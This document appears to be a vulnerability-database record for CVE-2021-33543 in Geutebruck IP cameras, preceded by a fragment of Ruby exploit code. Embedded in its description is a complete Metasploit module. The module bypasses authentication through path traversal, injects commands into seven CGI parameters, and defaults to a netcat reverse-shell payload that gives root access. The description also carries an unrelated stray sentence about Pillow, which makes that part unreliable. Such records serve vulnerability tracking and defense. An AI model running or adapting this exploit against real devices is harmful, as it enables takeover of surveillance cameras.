    # 1.12.13.2 / 1.12.14.5, CheckCode::Safe otherwise. No CGI page is contacted
    # here; the same version list can be used to inventory affected firmware.
    def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end

    rex_version = Rex::Version.new(version)
    vprint_status("Found Geutebruck version #{rex_version}")
    if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
      return CheckCode::Appears
    end
    
    CheckCode::Safe
    

    end

    # Sends one request for the selected target: chooses 'vars_get' or
    # 'vars_post' from the target's http_method, replaces the PLACEHOLDER_CMD
    # substring in each http_vars value with payload.encoded, and calls
    # send_request_cgi with the target's uri. The response is not examined, so
    # the closing status line is printed whether or not the device reacted.
    def exploit print_status("#{rhost}:#{rport} - Setting up request...")

    method = target['http_method']
    if method == 'GET'
      http_method_vars = 'vars_get'
    else
      http_method_vars = 'vars_post'
    end
    
    http_vars = target['http_vars']
    http_vars.each do |(k, v)|
      if v.include? 'PLACEHOLDER_CMD'
        http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
      end
    end
    
    print_status("Sending CMD injection request to #{rhost}:#{rport}")
    send_request_cgi(
      {
        'method' => method,
        'uri' => target['uri'],
        http_method_vars => http_vars
      }
    )
    print_status('Exploit complete, you should get a shell as the root user!')
    

    end end


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-0596",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * firmware    1.12.13.2    1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* een-20xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* efd-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ethc-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-cam"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* eec-2xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "works with the above firmware  s  e2 series camera models   encoders"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ebc-21xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-code"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "( multiple products )"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ewpc-22xx"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33543"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2095"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-33543",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2021-33543",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULMON",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2021-33543",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "MEDIUM",
                "trust": 0.1,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2021-33543",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2021-002023",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-33543",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-33543",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2021-002023",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-975",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202107-2095",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-33543",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-33543"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2095"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33543"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33543"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors allow unauthenticated remote access to sensitive files due to default user authentication settings. This can lead to manipulation of the device and denial of service. The following multiple vulnerabilities exist in G-Cam E2 and G-Code, provided by GEUTEBRUCK. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549. The expected impact depends on each vulnerability, but may include the following. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 \u2025 * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * A remote third party triggers a buffer overflow in the counter parameter and executes arbitrary code - CVE-2021-33545 \u2025 * A remote third party triggers a buffer overflow in the name parameter and executes arbitrary code - CVE-2021-33546 \u2025 * A remote third party triggers a buffer overflow in the profile parameter and executes arbitrary code - CVE-2021-33547 \u2025 * A remote third party triggers a buffer overflow in the action parameter and executes arbitrary code - CVE-2021-33549. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. 
##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::CmdStager\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        \u0027Name\u0027 =\u003e \u0027Geutebruck Multiple Remote Command Execution\u0027,\n        \u0027Description\u0027 =\u003e %q{\n          This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n          and exploits multiple authenticated arbitrary command execution vulnerabilities within\n          the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n          EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions \u003c= 1.12.0.27 as\n          well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n          remote code execution as the root user. 
\n        },\n\n        \u0027Author\u0027 =\u003e [\n          \u0027Titouan Lazard\u0027, # Of RandoriSec - Discovery\n          \u0027Ibrahim Ayadhi\u0027, # Of RandoriSec - Discovery and Metasploit Module\n          \u0027S\u00e9bastien Charbonnier\u0027 # Of RandoriSec - Metasploit Module\n        ],\n        \u0027License\u0027 =\u003e MSF_LICENSE,\n        \u0027References\u0027 =\u003e [\n          [\u0027CVE\u0027, \u00272021-33543\u0027],\n          [\u0027CVE\u0027, \u00272021-33544\u0027],\n          [\u0027CVE\u0027, \u00272021-33548\u0027],\n          [\u0027CVE\u0027, \u00272021-33550\u0027],\n          [\u0027CVE\u0027, \u00272021-33551\u0027],\n          [\u0027CVE\u0027, \u00272021-33552\u0027],\n          [\u0027CVE\u0027, \u00272021-33553\u0027],\n          [\u0027CVE\u0027, \u00272021-33554\u0027],\n          [ \u0027URL\u0027, \u0027http://geutebruck.com\u0027 ],\n          [ \u0027URL\u0027, \u0027https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],\n          [ \u0027URL\u0027, \u0027https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]\n        ],\n        \u0027DisclosureDate\u0027 =\u003e \u00272021-07-08\u0027,\n        \u0027Privileged\u0027 =\u003e true,\n        \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n        \u0027Arch\u0027 =\u003e [ARCH_CMD],\n        \u0027Targets\u0027 =\u003e [\n          [\n            \u0027CVE-2021-33544 - certmngr.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027createselfcert\u0027,\n                \u0027local\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027country\u0027 =\u003e Rex::Text.rand_text_alphanumeric(2),\n                \u0027state\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027,\n                \u0027organization\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n               
 \u0027organizationunit\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027commonname\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027days\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                \u0027type\u0027 =\u003e Rex::Text.rand_text_numeric(2..4)\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/certmngr.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33548 - factory.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027preserve\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/factory.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33550 - language.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/language.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33551 - oem.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027set\u0027,\n                \u0027enable\u0027 =\u003e \u0027yes\u0027,\n                \u0027environment.lang\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/oem.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33552 - simple_reclistjs.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027get\u0027,\n                \u0027timekey\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                
\u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/simple_reclistjs.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33553 - testcmd.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027command\u0027 =\u003e \u0027PLACEHOLDER_CMD\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/testcmd.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33554 - tmpapp.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027appfile.filename\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/tmpapp.cgi\u0027\n            }\n          ]\n        ],\n        \u0027DefaultTarget\u0027 =\u003e 0,\n        \u0027DefaultOptions\u0027 =\u003e {\n          \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n        },\n        \u0027Notes\u0027 =\u003e {\n          \u0027Stability\u0027 =\u003e [\u0027CRASH_SAFE\u0027],\n          \u0027Reliability\u0027 =\u003e [\u0027REPEATABLE_SESSION\u0027],\n          \u0027SideEffects\u0027 =\u003e [\u0027ARTIFACTS_ON_DISK\u0027]\n        }\n      )\n    )\n  end\n\n  def firmware\n    res = send_request_cgi(\n      \u0027method\u0027 =\u003e \u0027GET\u0027,\n      \u0027uri\u0027 =\u003e \u0027/brand.xml\u0027\n    )\n    unless res\n      print_error(\u0027Connection failed!\u0027)\n      return false\n    end\n\n    unless res\u0026.body \u0026\u0026 !res.body.empty?\n      print_error(\u0027Empty body in the response!\u0027)\n      return false\n    end\n\n    res_xml = res.get_xml_document\n    if res_xml.at(\u0027//firmware\u0027).nil?\n      print_error(\u0027Target did not respond with a XML document containing the \"firmware\" element!\u0027)\n      return false\n   
 end\n    raw_text = res_xml.at(\u0027//firmware\u0027).text\n    if raw_text \u0026\u0026 raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n      raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n    else\n      print_error(\u0027Target responded with a XML document containing the \"firmware\" element but its not a valid version string!\u0027)\n      false\n    end\n  end\n\n  def check\n    version = firmware\n    if version == false\n      return CheckCode::Unknown(\u0027Target did not respond with a valid XML response that we could retrieve the version from!\u0027)\n    end\n\n    rex_version = Rex::Version.new(version)\n    vprint_status(\"Found Geutebruck version #{rex_version}\")\n    if rex_version \u003c= Rex::Version.new(\u00271.12.0.27\u0027) || rex_version == Rex::Version.new(\u00271.12.13.2\u0027) || rex_version == Rex::Version.new(\u00271.12.14.5\u0027)\n      return CheckCode::Appears\n    end\n\n    CheckCode::Safe\n  end\n\n  def exploit\n    print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n    method = target[\u0027http_method\u0027]\n    if method == \u0027GET\u0027\n      http_method_vars = \u0027vars_get\u0027\n    else\n      http_method_vars = \u0027vars_post\u0027\n    end\n\n    http_vars = target[\u0027http_vars\u0027]\n    http_vars.each do |(k, v)|\n      if v.include? \u0027PLACEHOLDER_CMD\u0027\n        http_vars[k][\u0027PLACEHOLDER_CMD\u0027] = payload.encoded\n      end\n    end\n\n    print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n    send_request_cgi(\n      {\n        \u0027method\u0027 =\u003e method,\n        \u0027uri\u0027 =\u003e target[\u0027uri\u0027],\n        http_method_vars =\u003e http_vars\n      }\n    )\n    print_status(\u0027Exploit complete, you should get a shell as the root user!\u0027)\n  end\nend\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33543"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33543"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33543",
            "trust": 2.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-03",
            "trust": 1.8
          },
          {
            "db": "JVN",
            "id": "JVNVU97817785",
            "trust": 0.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-05",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023",
            "trust": 0.8
          },
          {
            "db": "PACKETSTORM",
            "id": "164036",
            "trust": 0.7
          },
          {
            "db": "CS-HELP",
            "id": "SB2021041363",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.2550",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021072807",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2095",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33543",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33543"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2095"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33543"
          }
        ]
      },
      "id": "VAR-202109-0596",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ],
        "trust": 0.01
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
